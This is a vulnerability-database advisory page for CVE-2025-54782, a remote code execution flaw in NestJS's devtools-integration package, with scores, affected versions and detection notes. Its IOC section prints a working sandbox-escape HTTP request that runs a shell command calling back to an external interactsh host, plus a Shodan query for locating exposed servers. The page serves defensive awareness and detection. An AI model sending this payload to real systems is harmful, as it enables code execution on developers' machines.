cbcvebase.
CVE-2025-54782
published 2025-08-02

CVE-2025-54782: Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability…

PriorityP188high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
46.17%
98.7th percentile
Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.

Affected

3 ranges
VendorProductVersion rangeFixed in
nestjsdevtools-integration< 0.2.10.2.1
nestjsdevtools-integration>= 0 < 0.2.10.2.1
nestjsnest< 0.2.10.2.1

Detection & IOCsextracted from sources · hover to see the quote

url/inspector/graph/interact
commandPOST /inspector/graph/interact HTTP/1.1 Host: {{Hostname}} Content-Type: text/plain {"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}
othershodan-query: "devtools.nestjs.com"
  • Monitor for POST requests to /inspector/graph/interact on locally running NestJS development servers; the endpoint accepts a JSON body with a 'code' field for arbitrary execution.
  • Detect sandbox escape pattern using propertyIsEnumerable.call() to obtain constructor chain and reach process.mainModule.require('child_process') within the vm.runInNewContext sandbox.
  • Requests to /inspector/graph/interact with Content-Type: text/plain returning HTTP 200 and application/plain content-type in response are indicative of successful exploitation.
  • Use Shodan query 'devtools.nestjs.com' to identify internet-exposed NestJS DevTools integration servers vulnerable to this RCE.
  • The vulnerability is present in @nestjs/devtools-integration versions 0.2.0 and below; flag any deployment of these versions with the devtools integration enabled.
  • ·The vulnerable endpoint is only exposed when the @nestjs/devtools-integration package is explicitly enabled in a NestJS application, typically only in local development environments — not in production by default.
  • ·Exploitation can be triggered cross-origin (CSRF-style) by any malicious website visited by the developer, due to missing cross-origin protections — no direct network access to the developer machine is required.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv4.09.4CRITICALCVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.4CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.